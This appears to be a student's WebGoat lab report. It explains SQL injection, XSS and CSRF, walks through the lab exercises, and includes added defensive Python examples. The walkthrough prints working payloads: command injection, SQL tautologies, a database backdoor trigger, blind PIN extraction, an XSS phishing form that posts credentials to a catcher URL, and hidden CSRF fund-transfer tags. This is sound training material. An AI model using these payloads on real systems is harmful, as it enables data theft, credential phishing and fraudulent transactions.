Exp9 Web Security Basics 20164302 Wang Yifan

1 Answers to basic questions

1. What is the principle of SQL injection attacks, and how are they defended against?

Principle:

SQL commands are inserted into a web form submission, a domain-name input field, or a page-request query string so that the server is tricked into executing the attacker's SQL. SQL injection exploits a design flaw in the application: it runs attacker-supplied SQL statements on the target server (and can serve as a foothold for other attacks). The main reason such attacks succeed is that user input is not filtered or sanitized.

Defense:

(1) Review the code at the injection points and filter SQL keywords out of the input, so that the code meets security standards;

(2) Do not connect to the database with administrator privileges; use a separate, least-privileged database connection for each application;

(3) The application should expose as little exception information as possible; error messages should be wrapped in custom messages rather than showing the original ones.

2. What is the principle of XSS attacks, and how are they defended against?

Principle:

XSS stands for cross-site scripting. To avoid confusion with the abbreviation for Cascading Style Sheets (CSS), cross-site scripting is abbreviated XSS. XSS is a security vulnerability in web applications that allows malicious code to be injected into pages that are served to other users.

Defense:

(1) XSS defenses mostly use feature (pattern) matching: all submitted information is checked for a match. For this kind of XSS attack, the pattern-matching approach generally searches for the keyword "javascript"; if the submitted information is found to contain "javascript", it is identified as an XSS attack;

(2) Check user input for illegal content such as angle brackets and quotation marks, and strictly control the output.

3. What is the principle of CSRF attacks, and how are they defended against?

Principle:

CSRF (Cross-site request forgery), also known as "One Click Attack" or Session Riding and often abbreviated CSRF or XSRF, is a malicious exploitation of a website. Although it sounds like cross-site scripting (XSS), it is very different: XSS exploits the user's trust in the site, whereas CSRF exploits the site's trust in the user by disguising a request as one sent by a trusted user. Compared with XSS, CSRF attacks are less well known (so resources on guarding against them are quite scarce) and harder to defend against, which is why they are considered more dangerous than XSS.

Defense:

(1) On the website, switch from persistent authorization methods (such as cookies or HTTP authentication) to a transient authorization method (a value provided in a hidden field in every form); this helps the site prevent these attacks. A similar approach is to include secret, user-specific information in the form as a verification code, in addition to the cookie;

(2) Improve the design of the site's API. Operations that create resources (such as posting) should accept only POST requests, and GET requests should only let the browser read without changing server-side resources.

2 Practice record

2.1 Downloading WebGoat

Download: https://github.com/WebGoat/WebGoat/releases/tag/7.0.1

After the download is complete, put the file in your home directory.

Open a terminal and run: java -jar WebGoat-Container-7.0.1-war-exec.jar

Open the browser at http://localhost:8080/WebGoat and enter the default user name and password.

2.2 SQL injection attacks (Injection Flaws)

2.2.1 Command Injection

Select Injection Flaws -> Command Injection

Right-click the select box on the page, choose Inspect Element to view the page elements, and modify the source: append "& netstat -an & ipconfig" at the end of the option value.

Click View; the network port usage and IP addresses are displayed, so the attack succeeded.

2.2.2 Numeric SQL Injection

Select Injection Flaws -> Numeric SQL Injection

Right-click the select box on the page, choose Inspect Element to view the source, and modify value="101": append or 1=1 after the station number 101.

Click Go; you can see the attack succeeded.

2.2.3 Log Spoofing

Select Injection Flaws -> Log Spoofing

In User Name, enter dgx%0d%0aLogin Succeeded for username: admin, using %0d (carriage return) and %0a (line feed) so that it appears as two lines in the log.

After entering any password and clicking Login, the user name is appended to the log file.
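The following is an added example, not part of the original write-up, showing why the %0d%0a payload above forges a second log entry and how a server neutralises it before logging. The "Login failed for username:" prefix is an assumed log format, and the decoded payload is constructed from the lesson input.

```python
from urllib.parse import unquote

# The lesson's payload, URL-decoded as the server would see it (constructed).
SPOOFED_NAME = unquote("dgx%0d%0aLogin Succeeded for username: admin")
# Assumed log format for a failed login (not WebGoat's actual code).
PREFIX = "Login failed for username: "


def log_line_vulnerable(username):
    # The raw name is written, so the embedded CR LF starts a forged second entry.
    return PREFIX + username


def log_line_safe(username):
    # Neutralise control characters (CR, LF and the rest of the C0 range plus DEL)
    # before the value reaches the log, so one event occupies exactly one line.
    cleaned = "".join(
        "\\x%02x" % ord(ch) if ord(ch) < 0x20 or ord(ch) == 0x7F else ch
        for ch in username
    )
    return PREFIX + cleaned


def entries_seen(line):
    # Number of separate log entries a reader (or a log parser) would see.
    return len(line.replace("\r\n", "\n").replace("\r", "\n").split("\n"))
```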

 

2.2.4 String SQL Injection

Select Injection Flaws -> String SQL Injection. Right-click the password box on the page, choose Inspect Element to view the page elements, and modify the source so that the maximum length limit is changed to 20.

Log in as user Neville with the password Smith' or '1' = '1

The attack succeeds and a list of all personnel is shown.
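An added example (not from the original write-up) illustrating defense (1) of question 1 against the two payloads used in 2.2.2 and 2.2.4: a string-concatenated query beside a parameterized one, run against an in-memory SQLite table. The table rows are constructed and only stand in for WebGoat's user_data table.

```python
import sqlite3

# Constructed rows standing in for WebGoat's user_data table (an assumption).
SAMPLE_ROWS = [
    (101, "Joe", "Snow", "987654321"),
    (102, "John", "Smith", "2234200065411"),
    (103, "Jane", "Plane", "333498703333"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, "
                 "last_name TEXT, cc_number TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, last_name):
    # The lesson's bug: user input is concatenated straight into the statement,
    # so Smith' or '1' = '1 closes the literal and appends an always-true test.
    sql = "SELECT userid, last_name FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, last_name):
    # Parameter binding: the value travels separately from the SQL text, so a
    # quote inside it can never terminate the literal or add a condition.
    sql = "SELECT userid, last_name FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def station_vulnerable(conn, station):
    # Numeric injection point: no quotes, so "101 or 1=1" is simply valid SQL.
    sql = "SELECT userid FROM user_data WHERE userid = " + station
    return conn.execute(sql).fetchall()


def station_safe(conn, station):
    # Validate the type first, then bind; "101 or 1=1" fails int() and is refused.
    try:
        station_id = int(station)
    except ValueError:
        return []
    return conn.execute("SELECT userid FROM user_data WHERE userid = ?",
                        (station_id,)).fetchall()
```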

2.2.5 Database Backdoors

Select Injection Flaws -> Database Backdoors

Enter 101; the user's information is returned.

Enter the injected statement 101; update employee set salary=10000

Enter 101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid to set the trigger.

2.2.6 Blind Numeric SQL Injection

The server page returns only two kinds of message, account valid or account invalid, so the account's PIN cannot simply be queried. However, the query the backend is using, SELECT * FROM user_data WHERE userid=accountNumber;, can be leveraged: if the account's information is returned, the page reports the account valid; otherwise it reports it invalid.

Enter 101 AND 1=1; the page reports the account valid.

Enter 101 AND 1=2; the second condition is false, so the page reports the account invalid.

Enter 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 ); the page reports the account invalid, which means PIN <= 10000.

By repeatedly adjusting the number, the range can be narrowed and the value of the PIN finally determined. In the end the following statement reports the account valid: 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 );

2.3 XSS attacks

2.3.1 Phishing with XSS

Use XSS and HTML injection to build a phishing page and enter it in the search box. The code is as follows:

</form>
<script>
// Sends the captured fields to the lesson's catcher URL, then shows the alert.
function hack() {
    XSSImage = new Image;
    XSSImage.src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
    alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br><br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name="pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

After entering it, scroll down the page; a user name box and a password box appear. Enter any user name and password.

2.3.2 Stored XSS Attacks

Enter any characters in Title, and in the message board enter <script>alert("I am 20164302. You've been attacked!!!");</script>

2.3.3 Reflected XSS Attacks

In Enter your three digit access code:, enter <script>alert("I am 20164302");</script> and click Purchase. An alert box is displayed successfully, with the content specified by our script.
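An added example (not part of the original write-up) for the XSS payloads in 2.3.2 and 2.3.3 and the defenses listed under question 2: it shows that the keyword filter from defense (1) does not even match the page's own payloads, while output encoding (defense (2), strictly controlling the output) renders them harmless. The comment-rendering function and the "javascript" variant payload are constructed for illustration.

```python
import html
import re

# Constructed payloads from the Stored and Reflected XSS lessons above.
STORED = '<script>alert("I am 20164302. You\'ve been attacked!!!");</script>'
REFLECTED = '<script>alert("I am 20164302");</script>'
# A constructed variant that does carry the keyword the write-up's filter checks.
KEYWORD_VARIANT = '<a href="javascript:alert(1)">x</a>'

SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def keyword_filter_blocks(text):
    # Defense (1) from the write-up: look for the literal word "javascript".
    # A plain <script> tag never contains it, so the lesson payloads pass through.
    return "javascript" in text.lower()


def render_vulnerable(message):
    # A stored or reflected message echoed verbatim into the page markup.
    return "<div class=comment>" + message + "</div>"


def render_safe(message):
    # Output encoding: < > & " ' become entities, so the browser parses the
    # message as text, never as a tag or an event handler.
    return "<div class=comment>" + html.escape(message, quote=True) + "</div>"


def contains_script_tag(page):
    # What a browser would act on: an unescaped <script> start tag in the page.
    return SCRIPT_TAG.search(page) is not None
```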

2.4 CSRF attacks

2.4.1 CSRF Prompt By-Pass

In Parameters on the right of the page, the src and menu values are 274 and 900 respectively.

In Parameters on the right of the page, the src and menu values are 2078372 and 900 respectively.

Enter any parameter in Title, and in the Message box enter

<iframe src="attack?Screen=274&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=274&menu=900&transferFunds=CONFIRM"> </iframe>

Place the URL into the Message box in the form of an image; the URL is then invisible to other users (the purpose of setting the width and height to 1 pixel is to hide the image). Once a user clicks the image, a CSRF event is triggered. Click Submit to submit.

A message named after the Title is generated in the Message List. When that message is clicked, the current page loads the message and displays it, and 5000 is transferred away from the user, which is the goal of the CSRF attack. The task bar on the left shows the task is complete.

2.4.2 Cross Site Request Forgery (CSRF)

In Parameters, the src and menu values are 312 and 900 respectively.

Enter any parameter in Title, and in the Message box enter

<img src="http://localhost:8080/WebGoat/attack?Screen=312&menu=900&transferFunds=5000" width="1" height="1" />

Click Submit (in the statement, &transferFunds=5000 is the amount transferred away from the victim; the purpose of setting the width and height to 1 pixel is to hide the image).
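An added example (not from the original write-up) of the two CSRF defenses from question 3 applied to the transferFunds request used in 2.4.1 and 2.4.2: a per-session token carried in a hidden form field, and refusing GET for a state-changing operation. The server secret, session id and the transfer_funds handler are assumptions that stand in for WebGoat's own code.

```python
import hashlib
import hmac
import secrets

# Assumed server-side secret and a constructed victim session (not WebGoat's).
SERVER_SECRET = secrets.token_bytes(32)
SESSION_ID = "session-of-victim"


def csrf_token(session_id):
    # Per-session token emitted as a hidden form field (defense (1)). A forged
    # <img> or <iframe> on another site cannot read it, so it cannot send it.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_funds(method, params, session_id):
    # Defense (2): a state-changing operation is accepted over POST only.
    if method != "POST":
        return "rejected: GET must not change server-side state"
    # Defense (1): the token in the form must match the one tied to this session.
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(session_id)):
        return "rejected: missing or wrong csrf_token"
    return "transferred " + params["transferFunds"]


# Parameters of the forged request in the lesson's <img src="...attack?Screen=312&menu=900&transferFunds=5000">.
FORGED = {"Screen": "312", "menu": "900", "transferFunds": "5000"}


def legitimate_form(session_id):
    # What the site's own transfer form submits: the same fields plus the token.
    return {"Screen": "312", "menu": "900", "transferFunds": "5000",
            "csrf_token": csrf_token(session_id)}
```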

3 Reflections on the experiment

This was the last experiment of the course. The content was not too complicated; it was completed on WebGoat, and there was guidance. Through hands-on operation I gained a further understanding of SQL, XSS and CSRF. I have always been relatively weak in practical hands-on work, so this course has been a real workout for me, and I gained a lot from it.

Origin www.cnblogs.com/wyf20164302/p/10926933.html